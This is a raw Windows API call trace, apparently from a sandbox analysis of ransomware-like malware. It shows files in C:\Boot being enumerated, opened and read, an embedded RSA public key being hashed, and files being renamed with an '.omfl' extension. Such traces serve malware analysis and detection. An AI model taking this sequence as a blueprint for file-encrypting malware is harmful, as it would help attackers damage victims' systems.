lpFileName="C:\\Boot\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0128.151] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.151] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36572c0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36572c0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.151] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0128.151] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.151] PathFindExtensionW (pszPath="C:\\Boot\\BCD") returned="" [0128.151] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.151] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0128.151] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.151] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG") returned=".LOG" [0128.151] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0128.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.152] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0128.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0128.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.152] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG1") returned=".LOG1" [0128.152] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0128.152] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=0) returned 1 [0128.152] CloseHandle (hObject=0x5c8) returned 1 [0128.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0128.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0128.152] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.omfl" (normalized: "c:\\boot\\bcd.log1.omfl")) returned 1 [0128.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0128.153] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0128.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0128.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.153] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0128.153] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0128.154] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=0) returned 1 [0128.154] CloseHandle (hObject=0x5c8) returned 1 [0128.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0128.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0128.154] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), lpNewFileName="C:\\Boot\\BCD.LOG2.omfl" (normalized: "c:\\boot\\bcd.log2.omfl")) returned 1 [0128.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0128.154] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0128.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0128.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.154] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0128.154] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0128.155] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=65536) returned 1 [0128.155] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0128.157] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xffda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.157] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0128.159] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.159] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x10000, lpOverlapped=0x0) returned 1 [0128.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0128.160] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0128.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0128.160] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0128.160] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0128.161] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0128.161] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0128.161] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0128.161] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x49ba5a0 [0128.161] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x49ba5a0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x49ba5a0, pdwDataLen=0xe00fa54) returned 1 [0128.161] GetLastError () returned 0x0 [0128.161] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.162] GetLastError () returned 0x0 [0128.162] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.163] SetLastError (dwErrCode=0x0) [0128.163] GetLastError () returned 0x0 [0128.164] SetLastError (dwErrCode=0x0) [0128.164] GetLastError () returned 0x0 [0128.164] SetLastError (dwErrCode=0x0) [0128.164] GetLastError () returned 0x0 [0128.164] SetLastError (dwErrCode=0x0) [0128.164] GetLastError () returned 0x0 [0128.164] SetLastError (dwErrCode=0x0) [0128.164] GetLastError () returned 0x0 [0128.164] SetLastError (dwErrCode=0x0) [0128.164] GetLastError () returned 0x0 [0128.164] SetLastError (dwErrCode=0x0) [0128.164] GetLastError () returned 0x0 [0128.164] SetLastError (dwErrCode=0x0) [0128.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0128.164] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.164] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49ba5a0 | out: hHeap=0x4970000) returned 1 [0128.164] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0128.164] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0128.164] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0128.164] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0128.164] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0128.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c9d8 [0128.164] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0128.164] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca48 | out: hHeap=0x4970000) returned 1 [0128.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca48 [0128.164] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10000) returned 0xdd2c688 [0128.166] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0128.166] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750c9d8 | out: hHeap=0x4970000) returned 1 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c9d8 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5c20 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2aa0 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74f11d8 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x49ba5e0 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0x74f11c0 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74f09b0 [0128.166] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf27d0 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74f1640 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x49ba5a0 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0x74f1610 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0x74f1628 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16908 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ce0 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd168f0 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd168c0 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd169e0 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0x74f4b10 [0128.167] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0x74f4b10, Size=0x218) returned 0xdd04a68 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0128.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0128.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169e0 | out: hHeap=0x4970000) returned 1 [0128.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd168c0 | out: hHeap=0x4970000) returned 1 [0128.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0128.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd168c0 [0128.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd169e0 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdf48 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16968 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9318 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd169e0 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf48 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd168c0 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9318 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0128.168] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd04a68 | out: hHeap=0x4970000) returned 1 [0128.168] GetCurrentThreadId () returned 0x618 [0128.168] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x190) returned 0xdd04db0 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf6030 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2c08 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd168c0 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d51a0 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cab8 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0128.169] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.169] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.169] GetCurrentThreadId () returned 0x618 [0128.169] GetVersionExA (in: lpVersionInformation=0xe00f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0xe00f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0xe00f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0128.169] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x77710000 [0128.170] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0128.170] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x745a0000 [0128.314] GetProcAddress (hModule=0x745a0000, lpProcName="NetStatisticsGet") returned 0x745a644f [0128.315] GetProcAddress (hModule=0x745a0000, lpProcName="NetApiBufferFree") returned 0x74a013d2 [0128.315] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0xe00f02c | out: Buffer=0xe00f02c) returned 0x0 [0128.344] GetCurrentThreadId () returned 0x618 [0128.344] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.344] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.344] NetApiBufferFree (Buffer=0xdd19a90) returned 0x0 [0128.344] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0xe00f02c | out: Buffer=0xe00f02c) returned 0x0 [0128.348] GetCurrentThreadId () returned 0x618 [0128.348] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.348] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.348] NetApiBufferFree (Buffer=0xdd08cc8) returned 0x0 [0128.348] FreeLibrary 